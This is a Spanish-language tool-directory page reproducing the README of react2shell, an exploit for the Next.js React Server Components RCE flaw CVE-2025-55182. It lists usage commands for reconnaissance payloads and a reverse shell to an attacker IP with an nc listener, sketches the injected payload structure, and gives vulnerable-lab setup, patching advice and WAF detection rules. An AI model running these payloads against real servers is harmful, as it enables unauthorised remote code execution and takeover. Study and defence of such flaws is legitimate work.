Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell — Un framework completo para explotar la vulnerabilidad CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/zr0n/react2shell
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubzr0n/react2shell

react2shell

Un framework completo para explotar la vulnerabilidad CVE-2025-55182

Ver Repositorio
1053hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell - PoC del Exploit CVE-2025-55182

Security Platform License

Un exploit de prueba de concepto para CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código en aplicaciones Next.js que utilizan React Server Components.

⚠️ AVISO LEGAL

ESTA HERRAMIENTA ES SOLO PARA PRUEBAS DE SEGURIDAD EDUCATIVAS Y AUTORIZADAS.

  • ❌ NO la utilices contra sistemas que no te pertenezcan o para los que no tengas permiso explícito de prueba
  • ❌ El acceso no autorizado a sistemas informáticos es ilegal
  • ✅ Úsala únicamente en entornos controlados para aprender y realizar pruebas de penetración autorizadas
  • ✅ El autor no es responsable del mal uso o los daños causados por esta herramienta

📋 Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-55182
  • Vulnerabilidad: Ejecución Remota de Código en React Server Components
  • Versiones Afectadas:
    • Next.js: ≥14.3.0-canary.77, todas las versiones 15.x y 16.x con App Router
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • Versiones Parcheadas:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
Descargar herramienta
  • Puntuación CVSS: Crítica
  • Vector de Ataque: Basado en red, requiere una solicitud POST manipulada
  • 🎯 Características

    • ✅ Compatibilidad multiplataforma (Windows y Linux)
    • ✅ Múltiples tipos de payloads
    • ✅ Capacidades de shell inversa
    • ✅ Payloads de prueba visual (calc, notepad)
    • ✅ Operaciones sobre el sistema de archivos
    • ✅ Recopilación de información del sistema

    🔧 Instalación

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 Uso

    Sintaxis Básica

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    Payloads Disponibles

    PayloadDescripciónEjemplo
    basicPrueba de concepto matemática (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiMuestra el usuario actual del sistemanode react2shell.js http://target:3000 whoami
    dirLista el contenido del directorio actualnode react2shell.js http://target:3000 dir
    systeminfoMuestra la información del sistema operativonode react2shell.js http://target:3000 systeminfo
    fileCrea el archivo de prueba EXPLOITED.txtnode react2shell.js http://target:3000 file
    calcAbre la calculadora (prueba visual en Windows)node react2shell.js http://target:3000 calc
    notepadAbre el bloc de notas (prueba visual en Windows)node react2shell.js http://target:3000 notepad
    shellShell inversa (detección automática Windows/Linux)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    Ejemplos

    1. Prueba de Concepto Básica

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Check server console for output: EXPLOITED: 50
    

    2. Reconocimiento del Sistema

    root@kitploit:~
    # Get current user
    node react2shell.js http://localhost:3000 whoami
    
    # List files
    node react2shell.js http://localhost:3000 dir
    
    # System information
    node react2shell.js http://localhost:3000 systeminfo
    

    3. Prueba Visual (Windows)

    root@kitploit:~
    # Launch calculator
    node react2shell.js http://localhost:3000 calc
    
    # Launch notepad
    node react2shell.js http://localhost:3000 notepad
    

    4. Prueba de Creación de Archivos

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Check server directory for EXPLOITED.txt
    

    5. Shell Inversa

    root@kitploit:~
    # Terminal 1: Start listener
    nc -lvnp 4444
    
    # Terminal 2: Execute exploit
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Works on both Windows (PowerShell) and Linux (Bash)
    

    🏗️ Configuración del Entorno Vulnerable

    Requisitos Previos

    • Node.js 18+
    • npm o yarn

    Crear una Aplicación Next.js Vulnerable

    root@kitploit:~
    # Create project directory
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Initialize Next.js with vulnerable version
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Downgrade to vulnerable version
    npm install [email protected]
    
    # Install dependencies
    npm install
    

    Aplicación Vulnerable Mínima (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    Iniciar el Servidor

    root@kitploit:~
    npm run dev
    # Server runs on http://localhost:3000
    

    🔍 Cómo Funciona

    El exploit aprovecha una vulnerabilidad de deserialización en React Server Components:

    1. Construcción del Payload: Crea un objeto serializado malicioso con contaminación de prototipos
    2. Acceso al Constructor de Funciones: Explota constructor.constructor para acceder al constructor de Function
    3. Inyección de Código: Inyecta código JavaScript arbitrario a través del campo _prefix
    4. Ejecución: El servidor deserializa el payload y ejecuta el código inyectado

    Detalles Técnicos

    root@kitploit:~
    // Simplified vulnerability chain
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ Mitigación

    Para Propietarios de Aplicaciones

    1. Actualizar Inmediatamente:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. Verificar las Versiones Parcheadas:

      root@kitploit:~
      npm list next react
      
    3. Versiones Requeridas:

      • Next.js: ≥16.0.7 o ≥15.5.7
      • React: ≥19.2.1 o ≥19.1.2

    Para Equipos de Seguridad

    • Escanea tu infraestructura en busca de versiones vulnerables de Next.js
    • Implementa reglas de Firewall de Aplicaciones Web (WAF) para detectar payloads RSC maliciosos
    • Supervisa solicitudes POST sospechosas con cabeceras next-action
    • Revisa los registros del lado del servidor para detectar patrones inesperados de ejecución de código

    📊 Detección

    Reglas WAF

    Busca solicitudes POST con:

    • Cabecera: next-action
    • Content-Type: multipart/form-data
    • Cuerpo que contenga: constructor, _prefix, _formData

    Patrones de Registro

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 Referencias

    • CVE-2025-55182 - NVD
    • Next.js Security Advisories
    • React Security Updates
    • OWASP Code Injection

    🤝 Contribuciones

    Esta es una herramienta educativa. Las contribuciones que mejoren:

    • Las capacidades de detección
    • La documentación
    • Las estrategias defensivas
    • El contenido educativo

    son bienvenidas. NO envíes contribuciones que mejoren las capacidades de ataque.

    📜 Licencia

    Solo para uso educativo - Sin garantía proporcionada

    👤 Autor

    Luiz Fernando Ziron Creado con fines educativos y de concienciación sobre ciberseguridad.

    ⚖️ Aviso Legal

    Al utilizar esta herramienta, aceptas:

    • Usarla únicamente en sistemas que te pertenezcan o para los que tengas permiso explícito por escrito
    • Asumir toda la responsabilidad por tus acciones
    • No responsabilizar al autor por cualquier mal uso o daño
    • Cumplir con todas las leyes y regulaciones aplicables

    El acceso no autorizado a sistemas informáticos es un delito en la mayoría de las jurisdicciones.


    Mantente seguro, actúa con ética y dentro de la ley. 🔒